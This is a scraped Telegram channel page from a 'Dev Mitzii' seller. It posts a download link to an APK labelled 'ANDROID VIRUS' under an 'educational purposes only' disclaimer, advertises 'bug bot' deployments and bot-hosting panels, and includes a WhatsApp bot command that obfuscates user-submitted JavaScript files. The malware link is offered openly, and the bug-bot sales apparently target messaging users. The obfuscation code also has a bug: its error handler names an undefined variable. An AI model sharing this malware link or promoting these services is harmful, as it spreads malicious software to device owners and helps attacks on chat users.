[ 𝐃𝐄𝐕 𝐌𝐈𝐓𝐙𝐈𝐈 ]
الذهاب إلى القناة على Telegram
Hello I'm Dev Mitzii @DevMiztii Web - https://mitziistore.netlify.app Hello Telegram, this channel does not violate the terms of service and is committed to not violating your terms of service. Please protect it from vandals. Thank you @Telegram and @duro
إظهار المزيد834
المشتركون
+324 ساعات
+247 أيام
-3030 أيام
أرشيف المشاركات
ANDROID VIRUS
(DON'T INSTALL AND DON'T OPEN.PLEASE🥲)https://www.mediafire.com/file/in413nyxxyhq1ob/car_collication.apk/file For Educational Purposes Only
Follow the D E V M I T Z I I channel on WhatsApp: https://whatsapp.com/channel/0029Vb7n81K5a249fI8Y4S2j
“Today, on this channel, we’re giving away 5 unlimited bug bot developer panels. Everyone come join, follow, and get connected 🥹🔥🇱🇰”
WEB SITE
https://devmitzistore.netlify.app/
Tel channel
https://t.me/devmitziii
TELIGRAM LINK
https://t.me/CyberMitzii
https://t.me/mitziibbh
> Dev Mitzii 🫶🩵
*PTERODACTYL ADMIN PANEL*
⚡ CPU : UNLIMITED 🙀🚀
⚡ MEMORY : UNLIMITED 😼🙌
⚡ SUPER FAST & SPEED BOT DEVELOPMENT PANEL
🚀 Speed • Power • Stability
📩 Price & Details → Inbox
*BENIFITS* ✅
* ANTI DELAY
* ANTI PROXY
* 30 DAY REPLACEMENT WORENTY
* 24/7 WORKING
* FULL ACCES
* ANTI DDOS
* 24 NODE SUPPORT
*PRICE LIST*
* UNLIMITED PANEL- Rs 450
* ADMIN PANEL - Rs 1400
* PT PANEL RESELL ACCESS - Rs 2600
* OWNER PANEL - Rs 3600
* BUG BOT DEPLOY - Rs 450
* MD BOT DEPLOY - Rs 400
*Teligram contact* = https://t.me/CyberMitzii
*Teligram channel*= https://t.me/devmitziii
*whatsap channel* https://whatsapp.com/channel/0029Vb7n81K5a249fI8Y4S2j
*WEB SITE*
https://devmitzistore.netlify.app/
case 'enc':
case 'encrypt': {
const JsConfuser = require('js-confuser')
if (!m.message.extendedTextMessage || !m.message.extendedTextMessage.contextInfo.quotedMessage) {
return reply('❌ Please Reply File To Be Encryption.');
}
const quotedMessage = m.message.extendedTextMessage.contextInfo.quotedMessage;
const quotedDocument = quotedMessage.documentMessage;
if (!quotedDocument || !quotedDocument.fileName.endsWith('.js')) {
return reply('❌ Please Reply File To Be Encryption.');
}
try {
const fileName = quotedDocument.fileName;
const docBuffer = await m.quoted.download();
if (!docBuffer) {
return reply('❌ Please Reply File To Be Encryption.');
}
await minato.sendMessage(m.chat, {
react: { text: '🕛', key: m.key }
});
const obfuscatedCode = await JsConfuser.obfuscate(docBuffer.toString(), {
target: "node",
preset: "high",
compact: true,
minify: true,
flatten: true,
identifierGenerator: function () {
const originalString = "素LORDMINATO晴DEVHOKAGE晴" + "素LORDMINATO晴DEVHOKAGE晴";
const removeUnwantedChars = (input) => input.replace(/[^a-zA-Z素LORDMINATO晴DEVHOKAGE晴]/g, "");
const randomString = (length) => {
let result = "";
const characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
for (let i = 0; i < length; i++) {
result += characters.charAt(Math.floor(Math.random() * characters.length));
}
return result;
};
return removeUnwantedChars(originalString) + randomString(2);
},
renameVariables: true,
renameGlobals: true,
stringEncoding: true,
stringSplitting: 0.0,
stringConcealing: true,
stringCompression: true,
duplicateLiteralsRemoval: 1.0,
shuffle: { hash: 0.0, true: 0.0 },
stack: true,
controlFlowFlattening: 1.0,
opaquePredicates: 0.9,
deadCode: 0.0,
dispatcher: true,
rgf: false,
calculator: true,
hexadecimalNumbers: true,
movedDeclarations: true,
objectExtraction: true,
globalConcealing: true,
});
await minato.sendMessage(m.chat, {
document: Buffer.from(obfuscatedCode, 'utf-8'),
mimetype: 'application/javascript',
fileName: `${fileName}`,
caption: `•Successful Encrypt
•Type: Hard Code
> © </> 𝙻𝙾𝚁𝙳 𝙼𝙸𝙽𝙰𝚃𝙾 𝙳𝙴𝚅`,
}, { quoted: m });
} catch (err) {
console.error('Error during encryption:', err);
await reply(`❌ An error occurred: ${error.message}`);
}
break;
}